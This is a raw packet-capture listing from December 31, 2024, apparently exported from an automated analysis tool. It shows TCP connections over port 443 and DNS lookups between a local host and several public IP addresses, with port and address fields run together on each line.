                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:29.768456936 CET50102443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:29.768479109 CET44350102116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:29.768484116 CET50102443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:29.768491030 CET44350102116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:29.768615007 CET50102443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:29.768631935 CET44350102116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:29.768811941 CET50102443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:29.768837929 CET44350102116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:29.768847942 CET50102443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:29.768863916 CET44350102116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:29.768944979 CET50102443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:29.768964052 CET44350102116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:29.769001007 CET50102443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:29.769011021 CET44350102116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:29.769063950 CET50102443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:29.769073963 CET44350102116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:29.769110918 CET50102443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:29.769124031 CET44350102116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:29.769129992 CET50102443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:29.769133091 CET44350102116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:29.799523115 CET6441153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:29.804351091 CET53644111.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:29.804481030 CET6441153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:29.804522038 CET6441153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:29.809322119 CET53644111.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:29.853617907 CET50103443192.168.2.523.44.203.195
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:29.853635073 CET4435010323.44.203.195192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:29.905997992 CET64412443192.168.2.5104.46.162.225
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:29.906043053 CET44364412104.46.162.225192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:29.906317949 CET64412443192.168.2.5104.46.162.225
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:29.906609058 CET64412443192.168.2.5104.46.162.225
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:29.906627893 CET44364412104.46.162.225192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:29.960769892 CET50103443192.168.2.523.44.203.195
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.019925117 CET44350106116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.020040035 CET50106443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.020627975 CET50106443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.020638943 CET44350106116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.022581100 CET50106443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.022587061 CET44350106116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.023081064 CET50106443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.023098946 CET44350106116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.023107052 CET50106443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.023111105 CET44350106116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.023205042 CET50106443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.023227930 CET44350106116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.023451090 CET50106443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.023637056 CET44350106116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.023803949 CET50106443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.023818970 CET44350106116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.023838043 CET50106443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.023855925 CET44350106116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.023860931 CET50106443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.023865938 CET44350106116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.023961067 CET50106443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.023973942 CET44350106116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.024012089 CET50106443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.024045944 CET44350106116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.024054050 CET50106443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.024065018 CET44350106116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.024081945 CET50106443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.024091005 CET44350106116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.024100065 CET50106443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.024105072 CET44350106116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.024117947 CET50106443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.024122000 CET44350106116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.024154902 CET50106443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.024171114 CET44350106116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.024173975 CET50106443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.024204016 CET50106443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.024219990 CET50106443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.024233103 CET50106443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.024277925 CET50106443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.024280071 CET44350106116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.024297953 CET50106443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.024331093 CET44350106116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.024338961 CET50106443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.024358988 CET50106443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.024410009 CET50106443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.024431944 CET50106443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.024441957 CET50106443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.024447918 CET44350106116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.039654970 CET44350106116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.259386063 CET53644111.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.269009113 CET64413443192.168.2.5104.46.162.225
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.269064903 CET44364413104.46.162.225192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.269212961 CET64413443192.168.2.5104.46.162.225
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.269496918 CET64413443192.168.2.5104.46.162.225
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.269517899 CET44364413104.46.162.225192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.270929098 CET6441153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.275880098 CET53644111.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.275969982 CET6441153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.474739075 CET44350104104.46.162.225192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.475357056 CET50104443192.168.2.5104.46.162.225
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.475382090 CET44350104104.46.162.225192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.475725889 CET44350104104.46.162.225192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.476811886 CET50104443192.168.2.5104.46.162.225
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.476875067 CET44350104104.46.162.225192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.477250099 CET50104443192.168.2.5104.46.162.225
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.477358103 CET50104443192.168.2.5104.46.162.225
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.477385998 CET44350104104.46.162.225192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.491352081 CET44350105104.46.162.225192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.494096041 CET50105443192.168.2.5104.46.162.225
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.494123936 CET44350105104.46.162.225192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.494474888 CET44350105104.46.162.225192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.494986057 CET50105443192.168.2.5104.46.162.225
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.495052099 CET44350105104.46.162.225192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.495151997 CET50105443192.168.2.5104.46.162.225
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.495244980 CET50105443192.168.2.5104.46.162.225
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.495275021 CET44350105104.46.162.225192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.812511921 CET49946443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.812541962 CET4434994623.1.237.91192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.812599897 CET49946443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.812606096 CET4434994623.1.237.91192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.812979937 CET64415443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.813009977 CET4436441523.1.237.91192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.813236952 CET64415443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.813549995 CET64415443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.813591957 CET4436441523.1.237.91192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.813725948 CET64415443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.814007998 CET44350105104.46.162.225192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.814078093 CET44350105104.46.162.225192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.814596891 CET50105443192.168.2.5104.46.162.225
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.814905882 CET50105443192.168.2.5104.46.162.225
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.814914942 CET44350105104.46.162.225192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.814927101 CET50105443192.168.2.5104.46.162.225
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:30.814961910 CET50105443192.168.2.5104.46.162.225
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:31.134249926 CET44350104104.46.162.225192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:31.134339094 CET44350104104.46.162.225192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:31.134406090 CET50104443192.168.2.5104.46.162.225
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:31.135386944 CET50104443192.168.2.5104.46.162.225
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:31.135407925 CET44350104104.46.162.225192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:31.165306091 CET44364412104.46.162.225192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:31.166186094 CET64412443192.168.2.5104.46.162.225
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:31.166203022 CET44364412104.46.162.225192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:31.167223930 CET44364412104.46.162.225192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:31.167285919 CET64412443192.168.2.5104.46.162.225
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:31.168081999 CET64412443192.168.2.5104.46.162.225
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:31.168143034 CET44364412104.46.162.225192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:31.168497086 CET64412443192.168.2.5104.46.162.225
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:31.168509960 CET44364412104.46.162.225192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:31.168627024 CET64412443192.168.2.5104.46.162.225
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:31.168654919 CET44364412104.46.162.225192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:31.241144896 CET44350102116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:31.241206884 CET50102443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:31.241218090 CET44350102116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:31.241271973 CET50102443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:31.244637966 CET50102443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:31.244657040 CET44350102116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:31.388176918 CET64416443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:31.388222933 CET44364416116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:31.388287067 CET64416443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:31.388720036 CET64416443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:31.388736010 CET44364416116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:31.493505955 CET44364413104.46.162.225192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:31.493865013 CET64413443192.168.2.5104.46.162.225
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:31.493880987 CET44364413104.46.162.225192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:31.494952917 CET44364413104.46.162.225192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:31.495043993 CET64413443192.168.2.5104.46.162.225
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:31.495364904 CET64413443192.168.2.5104.46.162.225
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:31.495424032 CET44364413104.46.162.225192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:31.495654106 CET64413443192.168.2.5104.46.162.225
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:31.495661974 CET44364413104.46.162.225192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:31.495713949 CET64413443192.168.2.5104.46.162.225
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:31.495742083 CET44364413104.46.162.225192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:31.563077927 CET44350106116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:31.563158035 CET44350106116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:31.563230038 CET50106443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:31.567785978 CET50106443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:31.567806005 CET44350106116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:31.665461063 CET64413443192.168.2.5104.46.162.225
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:31.840693951 CET44364412104.46.162.225192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:31.840786934 CET44364412104.46.162.225192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:31.840857983 CET64412443192.168.2.5104.46.162.225
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:31.841787100 CET64412443192.168.2.5104.46.162.225
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:31.841804028 CET44364412104.46.162.225192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:32.027630091 CET44364413104.46.162.225192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:32.027719975 CET44364413104.46.162.225192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:32.027978897 CET64413443192.168.2.5104.46.162.225
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:32.028381109 CET64413443192.168.2.5104.46.162.225
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:32.028403044 CET44364413104.46.162.225192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:32.028415918 CET64413443192.168.2.5104.46.162.225
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:32.028582096 CET64413443192.168.2.5104.46.162.225
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:32.038969994 CET44364416116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:32.040852070 CET64416443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:32.041774035 CET64416443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:32.041786909 CET44364416116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:32.043705940 CET64416443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:32.043713093 CET44364416116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:32.043875933 CET64416443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:32.043891907 CET44364416116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:32.043896914 CET64416443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:32.043904066 CET44364416116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:32.043997049 CET64416443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:32.044013977 CET44364416116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:32.044297934 CET64416443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:32.044317961 CET44364416116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:32.044431925 CET64416443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:32.044445992 CET44364416116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:32.044460058 CET64416443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:32.044464111 CET44364416116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:32.044545889 CET64416443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:32.044555902 CET44364416116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:32.502484083 CET64419443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:32.502502918 CET44364419116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:32.502734900 CET64419443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:32.503061056 CET64419443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:32.503072023 CET44364419116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:33.250075102 CET44364419116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:33.250144005 CET64419443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:33.250869036 CET64419443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:33.250875950 CET44364419116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:33.253464937 CET64419443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:33.253468990 CET44364419116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:33.253545046 CET64419443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:33.253560066 CET44364419116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:33.253565073 CET64419443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:33.253567934 CET44364419116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:33.253664017 CET64419443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:33.253685951 CET44364419116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:33.253870010 CET64419443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:33.253890991 CET44364419116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:33.253896952 CET64419443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:33.253900051 CET44364419116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:33.254038095 CET64419443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:33.254050970 CET44364419116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:33.254246950 CET64419443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:33.254276037 CET44364419116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:33.254282951 CET64419443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:33.254309893 CET44364419116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:33.254551888 CET64419443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:33.254564047 CET44364419116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:33.254582882 CET64419443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:33.254587889 CET44364419116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:33.254676104 CET64419443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:33.254687071 CET44364419116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:33.254748106 CET64419443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:33.254764080 CET44364419116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:33.254785061 CET64419443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:33.254792929 CET44364419116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:33.254808903 CET64419443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:33.254817963 CET44364419116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:33.254897118 CET64419443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:33.254904032 CET44364419116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:33.254925966 CET64419443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:33.254936934 CET44364419116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:33.254992962 CET64419443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:33.254998922 CET44364419116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:33.255013943 CET64419443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:33.255023956 CET44364419116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:33.255125046 CET64419443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:33.255136013 CET44364419116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:33.255162001 CET64419443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:33.255167007 CET44364419116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:33.255254030 CET64419443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:33.255264997 CET44364419116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:33.255269051 CET64419443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:33.255273104 CET44364419116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:33.255291939 CET64419443192.168.2.5116.203.14.4
